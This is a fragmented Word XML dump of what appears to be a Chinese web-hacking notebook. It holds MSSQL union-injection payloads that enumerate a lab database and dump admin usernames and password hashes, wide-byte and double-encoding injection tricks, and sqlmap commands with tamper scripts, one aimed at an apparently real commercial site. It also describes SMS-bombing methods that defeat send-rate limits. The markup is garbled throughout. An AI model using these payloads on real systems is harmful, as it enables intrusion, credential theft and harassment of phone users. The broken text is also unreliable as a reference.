            <wp:extent cx="8890" cy="88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5D2956" wp14:editId="47A52770">
            <wp:extent cx="5274310" cy="24809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25D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所有的数据库为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722EBB1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master','model','mozhe_db_v2','msdb','tempdb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB4EB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8）枚举出目标库的所有表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6397D71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_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53226212" w14:textId="34EC7785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407AB25" wp14:editId="1A150EFB">
            <wp:extent cx="8890" cy="88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DA1A6" wp14:editId="5B916E01">
            <wp:extent cx="5274310" cy="1264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1D8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_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects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name not in('manage')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038EF82D" w14:textId="351936F5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6F5D36" wp14:editId="7FD54DDE">
            <wp:extent cx="8890" cy="88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57966B" wp14:editId="5BDF9D42">
            <wp:extent cx="5274310" cy="13411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7CF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_user%2B'|'%2Bdb_name(),name,2 from mozhe_db_v2..sysobjects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name not in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anage','announcement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326CCB9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12CA655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所有的表名为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EE1D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anage','announcement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5F4B057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9）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枚举出表的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字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E8D8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1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b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.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a.id=b.id and a.name='manage'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B27B328" w14:textId="222A7513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324A62" wp14:editId="573B8A03">
            <wp:extent cx="8890" cy="88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5C5E55" wp14:editId="04540B01">
            <wp:extent cx="5274310" cy="1073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D3D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1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b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.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a.id=b.id and a.name='manage' and b.name not in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username','password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699B651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09825E4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表manage的字段名为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6968913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username','password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6B98556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同理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12445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1,system_user%2B'|'%2Bdb_name(),b.name,2 from mozhe_db_v2..sysobjects a, mozhe_db_v2..syscolumns b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.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a.id=b.id and a.name='announcement' and b.name not in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title','contents','tim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2DD570B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得到表announcement的字段名为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052CB0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title','contents','tim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33442A4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10）查询出需要的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917CCE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523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%2B'|'%2Busername,password,2 from mozhe_db_v2..manage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D6ABB" w14:textId="5369572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B965A" wp14:editId="619CB219">
            <wp:extent cx="8890" cy="88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E3F2BB" wp14:editId="55DE5EC6">
            <wp:extent cx="5274310" cy="1066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381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http://219.153.49.228:43523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%2B'|'%2Busername,password,2 from mozhe_db_v2..manage where username not in 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dmin_mz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3139828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06508F9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发现只有这一行记录 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA16FF1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dmin_mz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B50537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72e1bfc3f01b7583</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D8655" w14:textId="77777777" w:rsidR="00C51675" w:rsidRPr="00D53C32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F099729" w14:textId="77777777" w:rsidR="00D53C32" w:rsidRPr="00D53C32" w:rsidRDefault="00D53C32" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054A4547" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5064C0" w14:textId="77777777" w:rsidR="00921670" w:rsidRPr="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42209DD7" wp14:editId="78542C1A">
            <wp:extent cx="5274310" cy="1942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D6D1" w14:textId="77777777" w:rsidR="00164D08" w:rsidRPr="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="502CC9F8" wp14:editId="614D17EB">
            <wp:extent cx="4400550" cy="3228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EB31" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C11736A" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4485A7B0" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567EE048" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6EFFB9" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295546AF" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47855F52" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A6AC05" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2236DA" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9F0669" w14:textId="77777777" w:rsidR="00164D08" w:rsidRDefault="00164D08" w:rsidP="00164D08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659B70A1" wp14:editId="173CBDA9">
            <wp:extent cx="52743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D358" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00164D08"/>
    <w:p w14:paraId="5149B1B5" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>二次编码注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13334552" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1044C8D3" wp14:editId="39D9049E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2917" w14:textId="77777777" w:rsidR="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>urldecode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（）编码变成%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F02A14" w14:textId="77777777" w:rsidR="00921670" w:rsidRPr="00921670" w:rsidRDefault="00921670" w:rsidP="00921670">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%2527</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B091F" w14:textId="62E19D42" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>qlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AD1C2" w14:textId="77777777" w:rsidR="00C314AE" w:rsidRDefault="00C314AE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9D9135" w14:textId="3F8DBAEA" w:rsidR="00C314AE" w:rsidRDefault="00C314AE" w:rsidP="00C314AE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--delay  每次http(s)请求之间延迟时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9CB84" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="10317E51" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t xml:space="preserve">--threads 10 //如果你玩过 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">的话会对这个很熟悉 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>线程最高设置为10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7AA76" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>--level 3 //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>头的值。最高可到5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3642E" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>--risk 3 // 执行测试的风险（0-3，默认为1）risk越高，越</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>慢但是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>越安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19872775" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:r>
        <w:t>----search //后面跟参数 -D -T -C 搜索列（S），表（S）和</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>数据库名称（S） 如果你脑子够聪明，应该知道库列表名中可能会有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctf,flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>等字样，结果有时候题目就是这么耿直对吧？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710178CF" w14:textId="77777777"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sqlmap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 xml:space="preserve"> -u "http://chinalover.sinaapp.com/SQL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0A449A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GBK/</w:t>
      </w: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index.php?id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>=1%df%27" --search -C flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60849E13" w14:textId="77777777"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9A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--level 3 --risk 1 --thread 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB128ED" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve"> http://www.yr17.net/productview.php?productid=3059</w:t>
      </w:r>
      <w:r>
        <w:t>" --batch -v 3 --tamper "unmagicquotes.py" –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dbs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proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节绕过注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BE6C2" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t>http://www.yr17.net/productview.php?productid=3059  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t xml:space="preserve">tamper </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B403D9">
        <w:t>unmagicquotes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01509871" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128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593038E" wp14:editId="03FC367B">
            <wp:extent cx="5274310" cy="2815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D31D" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00C51675" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t xml:space="preserve">sqlmap.py -u </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-8/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --technique B --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A14128">
        <w:t>dbms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A14128">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --batch -v 0</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:br/>
        <w:t>或者：</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:br/>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>python sqlmap.py -u "</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidR="00A14128">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://127.0.0.1/sqli-labs-master/Less-8/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A14128">
        <w:t>" --technique B --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A14128">
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A14128">
        <w:t xml:space="preserve"> --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53AB85" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E7E433" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="092A3047" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328ACCAA" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DA6A6E" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0331BB2E" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E6968D" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2A539A" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00CD3AF6" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D60426" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>短信轰炸技巧：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A1168" w14:textId="484DA50A" w:rsidR="00A14128" w:rsidRDefault="00C51675" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00A14128" w:rsidRPr="00B01FDE">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
          </w:rPr>
          <w:t>https://www.anquanke.com/post/id/93878</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DF00219" w14:textId="77777777" w:rsidR="00863453" w:rsidRPr="00863453" w:rsidRDefault="00863453" w:rsidP="00863453">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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634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删除Cookie值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D2969" w14:textId="77777777" w:rsidR="00863453" w:rsidRPr="00863453" w:rsidRDefault="00863453" w:rsidP="00863453">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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634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手机号后加空格或者\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C14CCB" w14:textId="77777777" w:rsidR="00863453" w:rsidRPr="00863453" w:rsidRDefault="00863453" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2A6FF6" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="00A1412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在手机号后面加一个逗号会发现他会继续发送一条短信</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40161E83" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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继续增加一个逗号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D6D58" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRPr="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="008C4CAF">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="330" w:after="3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并且经过测试，逗号、点、减号等等均可能达到绕过的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51789612" w14:textId="77777777" w:rsidR="008C4CAF" w:rsidRPr="008C4CAF" w:rsidRDefault="008C4CAF" w:rsidP="008C4CAF">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="330" w:after="3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gramStart"/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大疆的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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这个例子中，此方法还绕过了系统设置的每小时和每天短信发送的最大数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2206DC" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266DE2FE" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="002D5237" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="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2C2A1" wp14:editId="33B1924D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-161567</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>978038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1901190"/>
            <wp:effectExtent l="0" t="0" r="254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99F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见</w:t>
      </w:r>
      <w:r w:rsidR="00A14128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务器</w:t>
      </w:r>
      <w:r w:rsidR="0039199F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9DF2C" w14:textId="77777777" w:rsidR="00972178" w:rsidRPr="00972178" w:rsidRDefault="00972178" w:rsidP="00972178"/>
    <w:p w14:paraId="6FE37DF6" w14:textId="77777777" w:rsidR="00A14128" w:rsidRPr="00A14128" w:rsidRDefault="00A14128" w:rsidP="00A14128"/>
    <w:p w14:paraId="0564448D" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72A68433" w14:textId="77777777" w:rsidR="00A14128" w:rsidRDefault="00A14128" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792A9475" w14:textId="77777777"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465888" wp14:editId="2BBF3AF7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5162550" cy="30670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E3720" w14:textId="77777777"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45DC3C" wp14:editId="2D1EE714">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-111760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3965133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2856865"/>
            <wp:effectExtent l="0" t="0" r="2540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5B2BE" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4207276C" w14:textId="77777777" w:rsidR="0039199F" w:rsidRDefault="0039199F" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27803294" w14:textId="77777777" w:rsidR="00CD3AF6" w:rsidRDefault="00CD3AF6" w:rsidP="000A449A"/>
    <w:p w14:paraId="7C211128" w14:textId="77777777" w:rsidR="008F3489" w:rsidRDefault="008F3489" w:rsidP="008F3489">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台登录的逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C30FB" w14:textId="77777777" w:rsidR="008F3489" w:rsidRPr="008F3489" w:rsidRDefault="008F3489" w:rsidP="008F3489">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3489">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=48686&amp;highlight=%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FD3FD" w14:textId="77777777" w:rsidR="008F3489" w:rsidRDefault="008F3489" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="444483B3" w14:textId="77777777" w:rsidR="00FA7087" w:rsidRDefault="00FA7087" w:rsidP="00FA7087">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
